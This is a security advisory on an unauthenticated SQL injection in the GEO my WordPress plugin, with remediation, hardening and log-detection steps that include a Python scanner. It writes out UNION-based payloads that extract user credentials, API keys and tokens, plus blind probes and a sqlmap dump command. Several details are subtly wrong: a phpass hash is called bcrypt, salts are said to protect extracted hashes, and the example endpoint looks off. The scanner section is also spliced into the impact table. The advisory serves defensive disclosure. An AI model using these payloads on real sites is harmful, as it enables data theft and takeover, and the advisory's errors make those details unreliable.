CVE-2026-52715: GEO my WordPress Unauthenticated SQL Injection
A critical unauthenticated SQL injection vulnerability has been disclosed in GEO my WordPress, a plugin that enables geolocation-based content customization on WordPress sites. Tracked as CVE-2026-52715 with a CVSS score of 9.3 (Critical), the flaw permits any unauthenticated attacker to extract data from the WordPress database by manipulating HTTP request parameters.
All versions of the plugin up to and including 4.5.5 are affected. The vulnerability is classified under CWE-89 (Improper Neutralization of Special Elements used in an SQL Command).
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-52715 |
| CVSS Score | 9.3 (Critical) |
| CWE Classification | CWE-89 — SQL Injection |
| Attack Type | Unauthenticated SQL Injection |
| Affected Plugin | GEO my WordPress |
| Affected Versions | <= 4.5.5 |
| Authentication Required | None |
| Patch Available | Update to version after 4.5.5 |
About GEO my WordPress
GEO my WordPress is a geolocation plugin that enables WordPress sites to serve location-aware content based on visitor IP address or user-provided location data. Common use cases include:
- Displaying localized pricing, currency, or language content
- Restricting or customizing content based on country or region
- Integrating with mapping services to show nearby locations
- Powering store locators and location-based search features
The plugin is used by e-commerce sites, franchise businesses, directories, and any WordPress operator that needs geographically targeted content delivery. Its integration with site-wide content queries makes the SQL injection flaw particularly dangerous — the vulnerable code path is likely triggered by ordinary site functionality.
Technical Background
SQL injection occurs when user-supplied data is incorporated into a database query without proper escaping or parameterization. In the case of GEO my WordPress, location-related parameters (country codes, coordinates, postal codes, or other geo identifiers) appear to be passed into MySQL queries without adequate sanitization.
A standard unauthenticated SQL injection attack against this type of plugin might look like:
```http
# URL-encoded attack targeting a geo query parameter
GET /wp-json/geo-my-wp/v1/search?geo_query=1%20UNION%20SELECT%20user_login,user_pass,user_email,4,5,6%20FROM%20wp_users-- HTTP/1.1

# Boolean-based blind extraction
GET /wp-ajax/?action=gmw_search&address=1'+AND+1=1-- HTTP/1.1   (true - normal response)
GET /wp-ajax/?action=gmw_search&address=1'+AND+1=2-- HTTP/1.1   (false - altered response)

# Time-based blind extraction
GET /wp-ajax/?action=gmw_search&lat=1+AND+SLEEP(5)-- HTTP/1.1
```
The absence of any authentication requirement means this attack is fully automatable using tools such as sqlmap:
```bash
# Automated exploitation example (authorized testing only)
sqlmap -u "https://target.example.com/wp-ajax/?action=gmw_search&address=1" \
  --dbms=mysql --dump --tables -p address
```
Attack Scenarios
Credential Exfiltration
The most immediate risk is extraction of WordPress administrator credentials:
```sql
-- Extract admin username and password hash
SELECT user_login, user_pass FROM wp_users WHERE ID=1
-- Result example:
-- admin | $P$BxxxxxxxxxxxxxxxxxxxxxxxxxxX (bcrypt hash)
```
Extracted bcrypt hashes can be subjected to offline dictionary attacks using tools like Hashcat or John the Ripper. If the administrator uses a weak or commonly used password, this can lead to account compromise within minutes.
Data Theft via UNION-based Injection
If the injection point returns reflected data (non-blind), attackers can use UNION SELECT to extract any table:
```sql
-- Extract all WordPress users
' UNION SELECT user_login, user_email, user_pass, 4 FROM wp_users--

-- Extract stored API keys from wp_options
' UNION SELECT option_name, option_value, 3, 4 FROM wp_options
  WHERE option_name LIKE '%api_key%'--

-- Extract RD Station, WooCommerce, or other plugin configurations
' UNION SELECT option_name, option_value, 3, 4 FROM wp_options
  WHERE option_name LIKE '%secret%' OR option_name LIKE '%token%'--
```
Location Data Exposure
GEO my WordPress may also store visitor geolocation records. Depending on the plugin's configuration, this could expose:
- Visitor IP addresses correlated with location
- User-submitted addresses or coordinates
- Business location data entered by site administrators
Scope and Prevalence
The GEO my WordPress plugin serves a niche but established segment of the WordPress ecosystem. Sites running the plugin tend to be:
- E-commerce stores serving multiple geographic markets
- Franchise and multi-location businesses with location-aware content needs
- Directories and local search platforms built on WordPress
The CVSS 9.3 rating reflects the combination of unauthenticated access and the high potential for critical data exfiltration, including administrator credentials that can enable full site takeover.
Remediation
Update the Plugin
Upgrade GEO my WordPress to a version after 4.5.5:
```bash
# Via WP-CLI
wp plugin update geo-my-wp

# Verify installed version
wp plugin get geo-my-wp --field=version
```
Or update via WordPress Admin > Plugins > GEO my WordPress > Update Now.
Interim Mitigations
- Temporarily deactivate the plugin if it is not essential to core business operations
- Deploy a Web Application Firewall (WAF) with SQL injection signature rules:
  - Wordfence (free tier includes basic SQLi protection)
  - Cloudflare WAF (managed rulesets block common SQLi patterns)
  - Sucuri Website Firewall
- Restrict access to vulnerable endpoints via IP allowlisting if the geo features are used only internally
- Enable WordPress salted hashing — ensure the WordPress secret keys and salts in wp-config.php are unique to limit the value of any extracted password hashes
Database Hardening
Limit the WordPress database user's privileges to reduce the impact of any SQL injection:
```sql
-- Grant minimum required privileges only
GRANT SELECT, INSERT, UPDATE, DELETE ON wordpress_db.* TO 'wp_user'@'localhost';

-- Revoke dangerous privileges if granted. FILE and SUPER are global privileges,
-- so they can only be revoked at the *.* level; the rest are database-level.
REVOKE FILE, SUPER ON *.* FROM 'wp_user'@'localhost';
REVOKE EXECUTE, CREATE, DROP ON wordpress_db.* FROM 'wp_user'@'localhost';
-- Note: WordPress core and plugin updates need CREATE/ALTER to run schema
-- changes (dbDelta); re-grant them temporarily for updates, then revoke again.
FLUSH PRIVILEGES;
```
Detection
Monitor web server logs and database activity for signs of exploitation:
```bash
# Scan access logs for SQL injection patterns in requests to the plugin's endpoints
grep -iE "(UNION.{0,30}SELECT|SLEEP\(|BENCHMARK\(|INFORMATION_SCHEMA|0x[0-9a-f]{6,})" \
  /var/log/nginx/access.log | grep -i "gmw\|geo.my.wp\|geo_query\|address=" | tail -100

# Look for anomalous response time (time-based SQLi).
# Assumes a log format that appends the request time in milliseconds as the last
# field; with the default combined format there is no timing field, and if you log
# $request_time (seconds) the threshold must be adjusted accordingly.
awk '$NF > 5000 {print $0}' /var/log/nginx/access.log | grep "gmw\|geo" | tail -50
```
Enable the MySQL slow query log to catch SLEEP() calls:
```sql
SET GLOBAL slow_query_log = 'ON';
SET GLOBAL long_query_time = 3;
SET GLOBAL slow_query_log_file = '/var/log/mysql/slow.log';
```
Impact Assessment
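The detection heuristics above, combined into a small log scanner as an added example (not part of the advisory and not the plugin's code). It assumes nginx's combined log format with $request_time in seconds appended as the last field; the sample log lines are constructed, and the endpoint and parameter names are taken from the advisory's own illustrative requests.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Request markers tied to GEO my WordPress, mirroring the advisory's grep filter
GEO_REQUEST = re.compile(r"gmw|geo[-_.]my[-_.]wp|geo_query", re.I)
# SQLi indicators, checked after URL-decoding so %20UNION%20SELECT is caught too
SQLI = re.compile(
    r"union.{0,30}select|sleep\(|benchmark\(|information_schema"
    r"|0x[0-9a-f]{6,}|'\s*(?:and|or)\s+\d+\s*=\s*\d+", re.I)
# nginx "combined" format with $request_time (seconds) as the last field (assumption)
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<rt>[\d.]+)$')


def analyze_line(line, slow_threshold=3.0):
    """Return a finding dict for a suspicious request to the geo endpoints, else None."""
    m = LOG_LINE.match(line)
    if not m or not GEO_REQUEST.search(m["target"]):
        return None
    params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    # parse_qs decodes once; decoding again also surfaces double-encoded payloads
    hits = [name for name, values in params.items()
            if any(SQLI.search(unquote_plus(v)) for v in values)]
    slow = float(m["rt"]) > slow_threshold  # time-based blind SQLi (SLEEP) shows up here
    if not hits and not slow:
        return None
    return {"ip": m["ip"], "time": m["ts"], "target": m["target"],
            "sqli_params": hits, "slow": slow}


def scan(log_text, slow_threshold=3.0):
    """Apply analyze_line to every line of a log and keep only the findings."""
    return [f for f in (analyze_line(ln, slow_threshold) for ln in log_text.splitlines()) if f]


# Constructed sample log (not real traffic); payload shapes follow the advisory's examples
SAMPLE_LOG = """\
198.51.100.7 - - [10/May/2026:12:00:01 +0000] "GET /wp-json/geo-my-wp/v1/search?geo_query=1%20UNION%20SELECT%20user_login,user_pass,user_email,4,5,6%20FROM%20wp_users-- HTTP/1.1" 200 3120 "-" "curl/8.0" 0.091
198.51.100.7 - - [10/May/2026:12:00:02 +0000] "GET /wp-ajax/?action=gmw_search&address=1'+AND+1=2-- HTTP/1.1" 200 2048 "-" "curl/8.0" 0.080
192.0.2.4 - - [10/May/2026:12:00:05 +0000] "GET /wp-ajax/?action=gmw_search&address=Berlin HTTP/1.1" 200 2048 "-" "Mozilla/5.0" 0.120
203.0.113.9 - - [10/May/2026:12:00:10 +0000] "GET /wp-ajax/?action=gmw_search&lat=1+AND+SLEEP(5)-- HTTP/1.1" 200 2048 "-" "Mozilla/5.0" 5.014
192.0.2.4 - - [10/May/2026:12:00:11 +0000] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0" 0.050
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Feed it a real access log with `scan(open(path).read())`; a request flagged as both slow and carrying a SLEEP() payload is the strongest signal of active time-based extraction.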
| Impact Area | Severity | Description |
|---|---|---|
| Credential Theft | Critical | Admin password hashes extractable without authentication |
| Full Site Takeover | Critical | Cracked credentials enable WordPress admin login |
| Customer Data | High | PII from WooCommerce orders, user registrations, or CRM data |
| API Key Exposure | High | Third-party integration keys stored in wp_options at risk |
| Location Data | Medium | Visitor geolocation records may be exposed |
| Exploitation Complexity | Very Low | Automatable with standard tools (sqlmap, Burp Suite) |
Key Takeaways
- CVE-2026-52715 is a critical unauthenticated SQL injection in GEO my WordPress <= 4.5.5
- CVSS 9.3 Critical — no authentication required, full database access possible
- Automatable exploitation — standard sqlmap tooling can extract credentials without special skill
- Admin credential risk — WordPress admin password hashes are directly extractable
- Immediate action: Update the plugin; deploy WAF rules; audit wp_options for exposed API keys if running an affected version